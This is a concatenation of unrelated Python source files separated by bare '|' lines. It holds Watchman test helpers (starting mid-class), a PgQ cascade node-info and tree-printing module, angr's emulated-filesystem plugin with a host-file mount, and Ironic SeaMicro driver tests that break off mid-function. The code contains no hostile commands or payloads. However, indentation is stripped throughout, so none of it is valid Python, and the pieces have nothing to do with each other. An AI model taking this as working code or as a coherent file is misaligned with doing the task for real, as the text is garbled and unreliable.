def getWatchList(self):
watch_list = self.watchmanCommand("watch-list")["roots"]
self.last_root_list = watch_list
return watch_list
def assertFileListsEqual(self, list1, list2, message=None):
list1 = [norm_relative_path(f) for f in list1]
list2 = [norm_relative_path(f) for f in list2]
self.assertCountEqual(list1, list2, message)
def fileListsEqual(self, list1, list2):
list1 = [norm_relative_path(f) for f in list1]
list2 = [norm_relative_path(f) for f in list2]
return sorted(list1) == sorted(list2)
def fileListContains(self, list1, list2):
""" return true if list1 contains each unique element in list2 """
set1 = set([norm_relative_path(f) for f in list1])
list2 = [norm_relative_path(f) for f in list2]
return set1.issuperset(list2)
def assertFileListContains(self, list1, list2, message=None):
if not self.fileListContains(list1, list2):
message = "list1 %r should contain %r: %s" % (list1, list2, message)
self.fail(message)
# Wait for the file list to match the input set
def assertFileList(
self, root, files=None, cursor=None, relativeRoot=None, message=None
):
expected_files = files or []
if (cursor is not None) and cursor[0:2] == "n:":
# it doesn't make sense to repeat named cursor queries, as
# the cursor moves each time
self.getFileList(root, cursor=cursor, relativeRoot=relativeRoot)
else:
st, res = self.waitFor(
lambda: self.fileListsEqual(
self.getFileList(root, cursor=cursor, relativeRoot=relativeRoot),
expected_files,
)
)
self.assertFileListsEqual(self.last_file_list, expected_files, message)
# Wait for the list of watched roots to match the input set
def assertWatchListContains(self, roots, message=None):
st, res = self.waitFor(
lambda: self.fileListContains(self.getWatchList(), roots)
)
self.assertFileListContains(self.last_root_list, roots, message)
def waitForSub(self, name, root, accept=None, timeout=10, remove=True):
client = self.getClient()
def default_accept(dat):
return True
if accept is None:
accept = default_accept
deadline = time.time() + timeout
while time.time() < deadline:
Interrupt.checkInterrupt()
sub = self.getSubscription(name, root=root, remove=False)
if sub is not None:
res = accept(sub)
if res:
return self.getSubscription(name, root=root, remove=remove)
# wait for more data
client.setTimeout(deadline - time.time())
client.receive()
return None
def getSubscription(self, name, root, remove=True, normalize=True):
data = self.getClient().getSubscription(name, root=root, remove=remove)
if data is None or not normalize:
return data
def norm_sub_item(item):
if isinstance(item, STRING_TYPES):
return norm_relative_path(item)
item["name"] = norm_relative_path(item["name"])
return item
def norm_sub(sub):
if "files" in sub:
files = []
for item in sub["files"]:
files.append(norm_sub_item(item))
sub["files"] = files
return sub
return list(map(norm_sub, data))
def isCaseInsensitive(self):
if hasattr(self, "_case_insensitive"):
return self._case_insensitive
d = self.mkdtemp()
self.touchRelative(d, "a")
self._case_insensitive = os.path.exists(os.path.join(d, "A"))
return self._case_insensitive
def suspendWatchman(self):
WatchmanInstance.getSharedInstance().suspend()
def resumeWatchman(self):
WatchmanInstance.getSharedInstance().resume()
def rootIsWatched(self, r):
r = norm_absolute_path(r)
watches = [
norm_absolute_path(root)
for root in self.watchmanCommand("watch-list")["roots"]
]
return r in watches
def skip_for(transports=None, codecs=None):
"""
Decorator to allow skipping tests for particular transports or codecs."""
transports = set(transports or ())
codecs = set(codecs or ())
def skip(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
if self.transport in transports or self.encoding in codecs:
self.skipTest(
"test skipped for transport %s, codec %s"
% (self.transport, self.encoding)
)
return f(self, *args, **kwargs)
return wrapper
return skip
def expand_matrix(test_class):
"""
A decorator function used to create different permutations from
a given input test class.
Given a test class named "MyTest", this will create 4 separate
classes named "MyTestLocalBser", "MyTestLocalBser2",
"MyTestLocalJson" and "MyTestCliJson" that will exercise the
different transport and encoding options implied by their names.
"""
matrix = [
("local", "bser", "LocalBser2"),
("local", "json", "LocalJson"),
("cli", "json", "CliJson"),
]
if not pywatchman.compat.PYTHON3:
matrix += [("local", "bser-v1", "LocalBser")]
# We do some rather hacky things here to define new test class types
# in our caller's scope. This is needed so that the unittest TestLoader
# will find the subclasses we define.
caller_scope = inspect.currentframe().f_back.f_locals
for (transport, encoding, suffix) in matrix:
def make_class(transport, encoding, suffix):
subclass_name = test_class.__name__ + suffix
# Define a new class that derives from the input class
class MatrixTest(test_class):
def setDefaultConfiguration(self):
self.setConfiguration(transport, encoding)
# Set the name and module information on our new subclass
MatrixTest.__name__ = subclass_name
MatrixTest.__qualname__ = subclass_name
MatrixTest.__module__ = test_class.__module__
# Before we publish the test, check whether that generated
# configuration would always skip
try:
t = MatrixTest()
t.checkPersistentSession()
t.checkOSApplicability()
caller_scope[subclass_name] = MatrixTest
except unittest.SkipTest:
pass
make_class(transport, encoding, suffix)
return None
|
|
#! /usr/bin/env python
"""Info about node/set/members. For admin tool.
"""
__all__ = ['MemberInfo', 'NodeInfo', 'QueueInfo']
# node types
ROOT = 'root'
BRANCH = 'branch'
LEAF = 'leaf'
class MemberInfo:
"""Info about set member."""
def __init__(self, row):
self.name = row['node_name']
self.location = row['node_location']
self.dead = row['dead']
class NodeInfo:
"""Detailed info about set node."""
name = None
type = None
global_watermark = None
local_watermark = None
completed_tick = None
provider_node = None
provider_location = None
consumer_name = None #?
worker_name = None #?
paused = False
uptodate = True
combined_queue = None
combined_type = None
def __init__(self, queue_name, row, main_worker = True, node_name = None):
self.queue_name = queue_name
self.member_map = {}
self.main_worker = main_worker
self.parent = None
self.consumer_map = {}
self.queue_info = {}
self._info_lines = []
self.cascaded_consumer_map = {}
self._row = row
if not row:
self.name = node_name
self.type = 'dead'
return
self.name = row['node_name']
self.type = row['node_type']
self.global_watermark = row['global_watermark']
self.local_watermark = row['local_watermark']
self.completed_tick = row['worker_last_tick']
self.provider_node = row['provider_node']
self.provider_location = row['provider_location']
self.consumer_name = row['worker_name']
self.worker_name = row['worker_name']
self.paused = row['worker_paused']
self.uptodate = row['worker_uptodate']
self.combined_queue = row['combined_queue']
self.combined_type = row['combined_type']
def __get_target_queue(self):
qname = None
if self.type == LEAF:
if self.combined_queue:
qname = self.combined_queue
else:
return None
else:
qname = self.queue_name
if qname is None:
raise Exception("no target queue")
return qname
def get_title(self):
return "%s (%s)" % (self.name, self.type)
def get_infolines(self):
lst = self._info_lines
if self.parent:
root = self.parent
while root.parent:
root = root.parent
cinfo = self.parent.consumer_map.get(self.consumer_name)
if cinfo and root.queue_info:
tick_time = cinfo['tick_time']
root_time = root.queue_info['now']
lag = root_time - tick_time
else:
lag = "(n/a?)"
elif self.queue_info:
lag = self.queue_info['ticker_lag']
else:
lag = "(n/a)"
txt = "lag: %s" % lag
if self.paused:
txt += ", PAUSED"
if not self.uptodate:
txt += ", NOT UPTODATE"
lst.append(txt)
for cname, row in self.cascaded_consumer_map.items():
err = row['cur_error']
if err:
lst.append("ERR: %s: %s" % (cname, err))
return lst
def add_info_line(self, ln):
self._info_lines.append(ln)
def load_status(self, curs):
self.consumer_map = {}
self.queue_info = {}
self.cascaded_consumer_map = {}
if self.queue_name:
q = "select consumer_name, current_timestamp - lag as tick_time,"\
" lag, last_seen, last_tick "\
"from pgq.get_consumer_info(%s)"
curs.execute(q, [self.queue_name])
for row in curs.fetchall():
cname = row['consumer_name']
self.consumer_map[cname] = row
q = "select current_timestamp - ticker_lag as tick_time,"\
" ticker_lag, current_timestamp as now "\
"from pgq.get_queue_info(%s)"
curs.execute(q, [self.queue_name])
self.queue_info = curs.fetchone()
q = "select * from pgq_node.get_consumer_info(%s)"
curs.execute(q, [self.queue_name])
for row in curs.fetchall():
cname = row['consumer_name']
self.cascaded_consumer_map[cname] = row
class QueueInfo:
"""Info about cascaded queue.
Slightly broken, as all info is per-node.
"""
def __init__(self, queue_name, info_row, member_rows):
self.local_node = NodeInfo(queue_name, info_row)
self.queue_name = queue_name
self.member_map = {}
self.node_map = {}
self.add_node(self.local_node)
for r in member_rows:
n = MemberInfo(r)
self.member_map[n.name] = n
def get_member(self, name):
return self.member_map.get(name)
def get_node(self, name):
return self.node_map.get(name)
def add_node(self, node):
self.node_map[node.name] = node
def tag_dead(self, node_name):
if node_name in self.node_map:
self.member_map[node_name].dead = True
else:
row = {'node_name': node_name, 'node_location': None, 'dead': True}
m = MemberInfo(row)
self.member_map[node_name] = m
#
# Rest is about printing the tree
#
_DATAFMT = "%-30s%s"
def print_tree(self):
"""Print ascii-tree for set.
Expects that data for all nodes is filled in."""
root_list = self._prepare_tree()
for root in root_list:
self._tree_calc(root)
datalines = self._print_node(root, '', [])
for ln in datalines:
print(self._DATAFMT % (' ', ln))
def _print_node(self, node, pfx, datalines):
# print a tree fragment for node and info
# returns list of unprinted data rows
for ln in datalines:
print(self._DATAFMT % (_setpfx(pfx, '|'), ln))
datalines = node.get_infolines()
print("%s%s" % (_setpfx(pfx, '+--'), node.get_title()))
for i, n in enumerate(node.child_list):
sfx = ((i < len(node.child_list) - 1) and ' |' or ' ')
datalines = self._print_node(n, pfx + sfx, datalines)
return datalines
def _prepare_tree(self):
# reset vars, fill parent and child_list for each node
# returns list of root nodes (mostly 1)
for node in self.node_map.values():
node.total_childs = 0
node.levels = 0
node.child_list = []
node.parent = None
root_list = []
for node in self.node_map.values():
if node.provider_node \
and node.provider_node != node.name \
and node.provider_node in self.node_map:
p = self.node_map[node.provider_node]
p.child_list.append(node)
node.parent = p
else:
node.parent = None
root_list.append(node)
return root_list
def _tree_calc(self, node):
# calculate levels and count total childs
# sort the tree based on them
total = len(node.child_list)
levels = 1
for subnode in node.child_list:
self._tree_calc(subnode)
total += subnode.total_childs
if levels < subnode.levels + 1:
levels = subnode.levels + 1
node.total_childs = total
node.levels = levels
node.child_list.sort(key = _node_key)
def _setpfx(pfx, sfx):
if pfx:
pfx = pfx[:-1] + sfx
return pfx
def _node_key(n):
return (n.levels, n.total_childs)
|
|
import os
import logging
from .plugin import SimStatePlugin
from ..storage.file import SimFile
from ..errors import SimMergeError
from ..misc.ux import once
l = logging.getLogger(name=__name__)
class SimFilesystem(SimStatePlugin): # pretends links don't exist
"""
angr's emulated filesystem. Available as state.fs.
When constructing, all parameters are optional.
:param files: A mapping from filepath to SimFile
:param pathsep: The character used to separate path elements, default forward slash.
:param cwd: The path of the current working directory to use
:param mountpoints: A mapping from filepath to SimMountpoint
:ivar pathsep: The current pathsep
:ivar cwd: The current working directory
:ivar unlinks: A list of unlink operations, tuples of filename and simfile. Be careful, this list is
shallow-copied from successor to successor, so don't mutate anything in it without copying.
"""
def __init__(self, files=None, pathsep=None, cwd=None, mountpoints=None):
super().__init__()
if files is None: files = {}
if pathsep is None: pathsep = b'/'
if cwd is None: cwd = pathsep
if mountpoints is None: mountpoints = {}
self.pathsep = pathsep
self.cwd = cwd
self._unlinks = []
self._files = {}
self._mountpoints = {}
for fname in mountpoints:
self.mount(fname, mountpoints[fname])
for fname in files:
self.insert(fname, files[fname])
@property
def unlinks(self):
for _, f in self._unlinks:
f.set_state(self.state)
return self._unlinks
def set_state(self, state):
super().set_state(state)
for fname in self._files:
self._files[fname].set_state(state)
for fname in self._mountpoints:
self._mountpoints[fname].set_state(state)
@SimStatePlugin.memo
def copy(self, memo):
o = SimFilesystem(
files={k: v.copy(memo) for k, v in self._files.items()},
pathsep=self.pathsep,
cwd=self.cwd,
mountpoints={k: v.copy(memo) for k, v in self._mountpoints.items()}
)
o._unlinks = list(self._unlinks)
return o
def merge(self, others, merge_conditions, common_ancestor=None):
merging_occured = False
for o in others:
if o.cwd != self.cwd:
raise SimMergeError("Can't merge filesystems with disparate cwds")
if len(o._mountpoints) != len(self._mountpoints):
raise SimMergeError("Can't merge filesystems with disparate mountpoints")
if list(map(id, o.unlinks)) != list(map(id, self.unlinks)):
raise SimMergeError("Can't merge filesystems with disparate unlinks")
for fname in self._mountpoints:
try:
subdeck = [o._mountpoints[fname] for o in others]
except KeyError:
raise SimMergeError("Can't merge filesystems with disparate file sets")
if common_ancestor is not None and fname in common_ancestor._mountpoints:
common_mp = common_ancestor._mountpoints[fname]
else:
common_mp = None
merging_occured |= self._mountpoints[fname].merge(subdeck, merge_conditions, common_ancestor=common_mp)
# this is a little messy
deck = [self] + others
all_files = set.union(*(set(o._files.keys()) for o in deck))
for fname in all_files:
subdeck = [o._files[fname] if fname in o._files else None for o in deck]
representative = next(x for x in subdeck if x is not None)
for i, v in enumerate(subdeck):
if v is None:
subdeck[i] = representative()
if i == 0:
self._files[fname] = subdeck[i]
if common_ancestor is not None and fname in common_ancestor._files:
common_simfile = common_ancestor._files[fname]
else:
common_simfile = None
merging_occured |= subdeck[0].merge(subdeck[1:], merge_conditions, common_ancestor=common_simfile)
return merging_occured
def widen(self, others): # pylint: disable=unused-argument
if once('fs_widen_warning'):
l.warning("Filesystems can't be widened yet - beware unsoundness")
def _normalize_path(self, path):
"""
Takes a path and returns a simple absolute path as a list of directories from the root
"""
if type(path) is str:
path = path.encode()
path = path.split(b'\0')[0]
if path[0:1] != self.pathsep:
path = self.cwd + self.pathsep + path
keys = path.split(self.pathsep)
i = 0
while i < len(keys):
if keys[i] == b'':
keys.pop(i)
elif keys[i] == b'.':
keys.pop(i)
elif keys[i] == b'..':
keys.pop(i)
if i != 0:
keys.pop(i-1)
i -= 1
else:
i += 1
return keys
def _join_chunks(self, keys):
"""
Takes a list of directories from the root and joins them into a string path
"""
return self.pathsep + self.pathsep.join(keys)
def chdir(self, path):
"""
Changes the current directory to the given path
"""
self.cwd = self._join_chunks(self._normalize_path(path))
def get(self, path):
"""
Get a file from the filesystem. Returns a SimFile or None.
"""
mountpoint, chunks = self.get_mountpoint(path)
if mountpoint is None:
return self._files.get(self._join_chunks(chunks))
else:
return mountpoint.get(chunks)
def insert(self, path, simfile):
"""
Insert a file into the filesystem. Returns whether the operation was successful.
"""
if self.state is not None:
simfile.set_state(self.state)
mountpoint, chunks = self.get_mountpoint(path)
if mountpoint is None:
self._files[self._join_chunks(chunks)] = simfile
return True
else:
return mountpoint.insert(chunks, simfile)
def delete(self, path):
"""
Remove a file from the filesystem. Returns whether the operation was successful.
This will add a ``fs_unlink`` event with the path of the file and also the index into the `unlinks` list.
"""
mountpoint, chunks = self.get_mountpoint(path)
apath = self._join_chunks(chunks)
if mountpoint is None:
try:
simfile = self._files.pop(apath)
except KeyError:
return False
else:
self.state.history.add_event('fs_unlink', path=apath, unlink_idx=len(self.unlinks))
self.unlinks.append((apath, simfile))
return True
else:
return mountpoint.delete(chunks)
def mount(self, path, mount):
"""
Add a mountpoint to the filesystem.
"""
self._mountpoints[self._join_chunks(self._normalize_path(path))] = mount
def unmount(self, path):
"""
Remove a mountpoint from the filesystem.
"""
del self._mountpoints[self._join_chunks(self._normalize_path(path))]
def get_mountpoint(self, path):
"""
Look up the mountpoint servicing the given path.
:return: A tuple of the mount and a list of path elements traversing from the mountpoint to the specified file.
"""
path_chunks = self._normalize_path(path)
for i in range(len(path_chunks) - 1, -1, -1):
partial_path = self._join_chunks(path_chunks[:-i])
if partial_path in self._mountpoints:
mountpoint = self._mountpoints[partial_path]
if mountpoint is None:
break
return mountpoint, path_chunks[-i:]
return None, path_chunks
SimFilesystem.register_default('fs')
class SimMount(SimStatePlugin):
"""
This is the base class for "mount points" in angr's simulated filesystem. Subclass this class and
give it to the filesystem to intercept all file creations and opens below the mountpoint.
Since this a SimStatePlugin you may also want to implement set_state, copy, merge, etc.
"""
def get(self, path_elements):
"""
Implement this function to instrument file lookups.
:param path_elements: A list of path elements traversing from the mountpoint to the file
:return: A SimFile, or None
"""
raise NotImplementedError
def insert(self, path_elements, simfile):
"""
Implement this function to instrument file creation.
:param path_elements: A list of path elements traversing from the mountpoint to the file
:param simfile: The file to insert
:return: A bool indicating whether the insert occurred
"""
raise NotImplementedError
def delete(self, path_elements):
"""
Implement this function to instrument file deletion.
:param path_elements: A list of path elements traversing from the mountpoint to the file
:return: A bool indicating whether the delete occurred
"""
raise NotImplementedError
class SimConcreteFilesystem(SimMount):
"""
Abstract SimMount allowing the user to import files from some external source into the guest
:param str pathsep: The host path separator character, default os.path.sep
"""
def __init__(self, pathsep=os.path.sep):
super().__init__()
self.pathsep = pathsep
self.cache = {}
self.deleted_list = set()
def get(self, path_elements):
path = self.pathsep.join(x.decode() for x in path_elements)
if path in self.deleted_list:
return None
if path not in self.cache:
simfile = self._load_file(path)
if simfile is None:
return None
self.insert(path_elements, simfile)
return self.cache[path]
def _load_file(self, guest_path):
raise NotImplementedError
def insert(self, path_elements, simfile):
path = self.pathsep.join(x.decode() for x in path_elements)
simfile.set_state(self.state)
self.cache[path] = simfile
self.deleted_list.discard(path)
return True
def delete(self, path_elements):
path = self.pathsep.join(x.decode() for x in path_elements)
self.deleted_list.add(path)
return self.cache.pop(path, None) is not None
@SimStatePlugin.memo
def copy(self, memo):
x = type(self)(pathsep=self.pathsep)
x.cache = {fname: self.cache[fname].copy(memo) for fname in self.cache}
x.deleted_list = set(self.deleted_list)
return x
def set_state(self, state):
super().set_state(state)
for fname in self.cache:
self.cache[fname].set_state(state)
def merge(self, others, merge_conditions, common_ancestor=None):
merging_occured = False
for o in others:
if o.pathsep != self.pathsep:
raise SimMergeError("Can't merge concrete filesystems with disparate pathseps")
if o.deleted_list != self.deleted_list:
raise SimMergeError("Can't merge concrete filesystems with disparate deleted files")
deck = [self] + others
all_files = set.union(*(set(o._files.keys()) for o in deck))
for fname in all_files:
subdeck = []
basecase = None
for o in deck:
try:
subdeck.append(o.cache[fname])
except KeyError:
if basecase is None:
basecase = self._load_file(fname)
subdeck.append(basecase)
if common_ancestor is not None and fname in common_ancestor.cache:
common_simfile = common_ancestor.cache[fname]
else:
common_simfile = None
merging_occured |= subdeck[0].merge(subdeck[1:], merge_conditions, common_ancestor=common_simfile)
return merging_occured
def widen(self, others): # pylint: disable=unused-argument
if once('host_fs_widen_warning'):
l.warning("The host filesystem mount can't be widened yet - beware unsoundness")
class SimHostFilesystem(SimConcreteFilesystem):
"""
Simulated mount that makes some piece from the host filesystem available to the guest.
:param str host_path: The path on the host to mount
:param str pathsep: The host path separator character, default os.path.sep
"""
def __init__(self, host_path=None, **kwargs):
super().__init__(**kwargs)
self.host_path = host_path if host_path is not None else self.pathsep
@SimStatePlugin.memo
def copy(self, memo):
o = super().copy(memo)
o.host_path = self.host_path
return o
def _load_file(self, guest_path):
path = os.path.join(self.host_path, guest_path)
try:
with open(path, 'rb') as fp:
content = fp.read()
except OSError:
return None
else:
return SimFile(name='file://' + path, content=content, size=len(content))
#class SimDirectory(SimStatePlugin):
# """
# This is the base class for directories in angr's emulated filesystem. An instance of this class or a subclass will
# be found as ``state.fs``, representing the root of the filesystem.
#
# :ivar files: A mapping from filename to file that this directory contains.
# """
# def __init__(self, files=None, writable=True, parent=None, pathsep='/'):
# super(SimDirectory, self).__init__()
# self.files = files
# self.writable = writable
# self.parent = parent if parent is not None else self
# self.pathsep = pathsep
# self.files['.'] = self
# self.files['..'] = self.parent
#
# def __len__(self):
# return len(self.files)
#
# def lookup(self, path, writing=False):
# """
# Look up the file or directory at the end of the given path.
# This method should be called on the current working directory object.
#
# :param str path: The path to look up
# :param bool writing: Whether the operation desired requires write permissions
# :returns: The SimDirectory or SimFile object specified, or None if not found, or False if writing
# was requested and the target is nonwritable
# """
# if len(path) == 0:
# return None
# if path[0] == self.pathsep:
# # lookup the filesystem root
# root = self
# while root.parent is not root:
# root = root.parent
# return root._lookup(path[1:], writing)
# else:
# return self._lookup(path, writing)
#
# def _lookup(self, path, writing):
# while path.startswith(self.pathsep):
# path = path[1:]
#
# if len(path) == 0:
# if writing and not self.writable:
# return False
# return self
#
# for fname, simfile in self.files.items():
# if path.startswith(fname):
# if len(path) == len(fname):
# if writing and not simfile.writable:
# return False
# return simfile
# elif path[len(fname)] == self.pathsep:
# if isinstance(simfile, SimDirectory):
# return simfile._lookup(path[len(fname)+1:])
# else: # TODO: symlinks
# return None
#
# return None
#
# def insert(self, path, simfile):
# """
# Add a file to the filesystem.
# This method should be called on the current working directory object.
#
# :param str path: The path to insert the new file at
# :param simfile: The new file or directory
# :returns: A boolean indicating whether the operation succeeded
# """
# while len(path) > 1 and path[-1] == self.pathsep:
# path = path[:-1]
#
# if self.pathsep not in path:
# if path in self.files:
# return False
# if isinstance(simfile, SimDirectory):
# if simfile.parent is simfile:
# simfile.parent = self
# simfile.pathsep = self.pathsep
# else:
# l.error("Trying to add directory to filesystem which already has a parent")
#
# self.files[path] = simfile
# simfile.set_state(self.state)
# return True
# else:
# lastsep = path.rindex(self.pathsep) + 1
# head, tail = path[:lastsep], path[lastsep:]
# parent = self.lookup(head, True)
#
# if not parent:
# return False
# return parent.insert(tail, simfile)
#
# def remove(self, path):
# """
# Remove a file from the filesystem. If the target is a directory, the directory must be empty.
# This method should be called on the current working directory object.
#
# :param str path: The path to remove the file at
# :returns: A boolean indicating whether the operation succeeded
# """
# while len(path) > 1 and path[-1] == self.pathsep:
# # TODO: when symlinks exist this will need to be fixed to delete the target of the
# # symlink instead of the link itself
# path = path[:-1]
#
# if self.pathsep not in path:
# if path in ('.', '..'):
# return False
# if path not in self.files:
# return False
# if isinstance(self.files[path], SimDirectory) and len(self.files[path]) != 2:
# return False
#
# del self.files[path]
# return True
# else:
# lastsep = path.rindex(self.pathsep) + 1
# head, tail = path[:lastsep], path[lastsep:]
# parent = self.lookup(head, True)
#
# if not parent:
# return False
# return parent.remove(tail)
#
# @SimStatePlugin.memo
# def copy(self, memo):
# return SimDirectory(
# files={x: y.copy(memo) for x, y in self.files.items()},
# writable=self.writable,
# parent=self.parent.copy(memo),
# pathsep=self.pathsep)
#
# def merge(self, others, conditions, ancestor=None):
# new_files = {path: (simfile, [], []) for path, simfile in self.files.items() if path not in ('.', '..')}
# for other, condition in zip(others, conditions):
# if type(other) is not type(self):
# raise SimMergeError("Can't merge filesystem elements of disparate types")
# for path, simfile in other.files.items():
# if path in ('.', '..'):
# continue
# if path not in new_files:
# l.warning("Cannot represent the conditional creation of files")
# new_files[path] = (simfile, [], [])
# else:
# new_files[path][1].append(simfile)
# new_files[path][2].append(condition)
#
# for k in new_files:
# new_files[k][0].merge(new_files[k][1], new_files[k][2], ancestor)
# new_files[k] = new_files[k][0]
# new_files['.'] = self
# new_files['..'] = self.parent
# self.files = new_files
#
# def widen(self, others):
# new_files = {path: [simfile] for path, simfile in self.files.items() if path not in ('.', '..')}
# for other in others:
# if type(other) is not type(self):
# raise SimMergeError("Can't merge filesystem elements of disparate types")
# for path, simfile in other.files.items():
# if path in ('.', '..'):
# continue
# if path not in new_files:
# new_files[path] = [simfile]
# else:
# new_files[path].append(simfile)
#
# for k in new_files:
# new_files[k][0].widen(new_files[k][1:])
# new_files[k] = new_files[k][0]
# new_files['.'] = self
# new_files['..'] = self.parent
# self.files = new_files
#
#class SimDirectoryConcrete(SimDirectory):
# """
# A SimDirectory that forwards its requests to the host filesystem
#
# :param host_path: The path on the host filesystem to provide
# :param writable: Whether to allow mutation of the host filesystem by the guest
# """
# def __init__(self, host_path, writable=False, pathsep='/', host_root=None, parent=None):
# super(SimConcreteDirectory, self).__init__(files={}, writable=writable, parent=parent, pathsep=pathsep)
# self.host_path = os.path.realpath(host_path)
# self.host_root = self.host_path if host_root is None else host_root
#
# def _lookup(self, path, writing):
# partial_path = self.host_path
# for i, pathkey in enumerate(path.split(self.pathsep)):
# if partial_path == self.host_root and pathkey == '..':
# target = self.pathsep.join(path.split(self.pathsep)[i+1:])
# return self.parent._lookup(target, writing)
# if not os.path.isdir(partial_path):
# return None
#
# partial_path = os.path.realpath(partial_path + self.pathsep + pathkey)
#
# if writing and not self.writable:
# return False
#
# if os.path.isdir(partial_path):
# f = SimDirectoryConcrete(host_path=partial_path, writable=self.writable, host_root=self.host_root, parent=self.parent)
# f.set_state(self.state)
# return f
# elif os.path.isfile(partial_path):
# try:
# f = SimFileConcrete(host_path=partial_path, writable=self.writable)
# f.set_state(self.state)
# return f
# except OSError:
# return None
# else:
# raise SimFilesystemError("Can't handle something other than a file or directory in a concrete filesystem")
#
# def insert(self, path, simfile):
# if self.pathsep in path:
# return super(SimDirectoryConcrete, self).insert(path, simfile)
# else:
# fullpath = os.path.join(self.host_path, path)
# if os.path.exists(fullpath):
# return False
# with open(fullpath, 'w') as fp:
# fp.write(simfile.concretize())
# return True
#
# def remove(self, path):
# if self.pathsep in path:
# return super(SimDirectoryConcrete, self).remove(path)
# else:
# fullpath = os.path.join(self.host_path, path)
# if not os.path.exists(fullpath):
# return False
# if os.path.isdir(fullpath):
# try:
# os.rmdir(fullpath)
# except OSError:
# return False
# return True
# elif os.path.isfile(fullpath):
# try:
# os.unlink(fullpath)
# except OSError:
# return False
# return True
# else:
# raise SimFilesystemError("Can't handle anything but files and directories in concrete filesystem")
#
#SimDirectory.register_default('fs')
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for Ironic SeaMicro driver."""
import uuid
import mock
from seamicroclient import client as seamicro_client
from seamicroclient import exceptions as seamicro_client_exception
from ironic.common import boot_devices
from ironic.common import driver_factory
from ironic.common import exception
from ironic.common import states
from ironic.common import utils
from ironic.conductor import task_manager
from ironic.drivers.modules import seamicro
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base as db_base
from ironic.tests.db import utils as db_utils
from ironic.tests.objects import utils as obj_utils
INFO_DICT = db_utils.get_test_seamicro_info()
class Fake_Server():
def __init__(self, active=False, *args, **kwargs):
self.active = active
self.nic = {'0': {'untaggedVlan': ''}}
def power_on(self):
self.active = True
def power_off(self, force=False):
self.active = False
def reset(self):
self.active = True
def set_untagged_vlan(self, vlan_id):
return
def attach_volume(self, volume_id):
return
def detach_volume(self):
return
def set_boot_order(self, boot_order):
return
def refresh(self, wait=0):
return self
class Fake_Volume():
def __init__(self, id=None, *args, **kwargs):
if id is None:
self.id = "%s/%s/%s" % ("0", "ironic-p6-6", str(uuid.uuid4()))
else:
self.id = id
class Fake_Pool():
def __init__(self, freeSize=None, *args, **kwargs):
self.freeSize = freeSize
class SeaMicroValidateParametersTestCase(db_base.DbTestCase):
def test__parse_driver_info_good(self):
# make sure we get back the expected things
node = obj_utils.get_test_node(
self.context,
driver='fake_seamicro',
driver_info=INFO_DICT)
info = seamicro._parse_driver_info(node)
self.assertIsNotNone(info.get('api_endpoint'))
self.assertIsNotNone(info.get('username'))
self.assertIsNotNone(info.get('password'))
self.assertIsNotNone(info.get('server_id'))
self.assertIsNotNone(info.get('uuid'))
def test__parse_driver_info_missing_api_endpoint(self):
# make sure error is raised when info is missing
info = dict(INFO_DICT)
del info['seamicro_api_endpoint']
node = obj_utils.get_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
seamicro._parse_driver_info,
node)
def test__parse_driver_info_missing_username(self):
# make sure error is raised when info is missing
info = dict(INFO_DICT)
del info['seamicro_username']
node = obj_utils.get_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
seamicro._parse_driver_info,
node)
def test__parse_driver_info_missing_password(self):
# make sure error is raised when info is missing
info = dict(INFO_DICT)
del info['seamicro_password']
node = obj_utils.get_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
seamicro._parse_driver_info,
node)
def test__parse_driver_info_missing_server_id(self):
# make sure error is raised when info is missing
info = dict(INFO_DICT)
del info['seamicro_server_id']
node = obj_utils.get_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
seamicro._parse_driver_info,
node)
class SeaMicroPrivateMethodsTestCase(db_base.DbTestCase):
def setUp(self):
super(SeaMicroPrivateMethodsTestCase, self).setUp()
n = {
'driver': 'fake_seamicro',
'driver_info': INFO_DICT
}
self.node = obj_utils.create_test_node(self.context, **n)
self.Server = Fake_Server
self.Volume = Fake_Volume
self.Pool = Fake_Pool
self.config(action_timeout=0, group='seamicro')
self.config(max_retry=2, group='seamicro')
self.patcher = mock.patch('eventlet.greenthread.sleep')
self.mock_sleep = self.patcher.start()
@mock.patch.object(seamicro_client, "Client")
def test__get_client(self, mock_client):
driver_info = seamicro._parse_driver_info(self.node)
args = {'username': driver_info['username'],
'password': driver_info['password'],
'auth_url': driver_info['api_endpoint']}
seamicro._get_client(**driver_info)
mock_client.assert_called_once_with(driver_info['api_version'], **args)
@mock.patch.object(seamicro_client, "Client")
def test__get_client_fail(self, mock_client):
driver_info = seamicro._parse_driver_info(self.node)
args = {'username': driver_info['username'],
'password': driver_info['password'],
'auth_url': driver_info['api_endpoint']}
mock_client.side_effect = seamicro_client_exception.UnsupportedVersion
self.assertRaises(exception.InvalidParameterValue,
seamicro._get_client,
**driver_info)
mock_client.assert_called_once_with(driver_info['api_version'], **args)
@mock.patch.object(seamicro, "_get_server")
def test__get_power_status_on(self, mock_get_server):
mock_get_server.return_value = self.Server(active=True)
pstate = seamicro._get_power_status(self.node)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__get_power_status_off(self, mock_get_server):
mock_get_server.return_value = self.Server(active=False)
pstate = seamicro._get_power_status(self.node)
self.assertEqual(states.POWER_OFF, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__get_power_status_error(self, mock_get_server):
mock_get_server.return_value = self.Server(active=None)
pstate = seamicro._get_power_status(self.node)
self.assertEqual(states.ERROR, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__power_on_good(self, mock_get_server):
mock_get_server.return_value = self.Server(active=False)
pstate = seamicro._power_on(self.node)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__power_on_fail(self, mock_get_server):
def fake_power_on():
return
server = self.Server(active=False)
server.power_on = fake_power_on
mock_get_server.return_value = server
pstate = seamicro._power_on(self.node)
self.assertEqual(states.ERROR, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__power_off_good(self, mock_get_server):
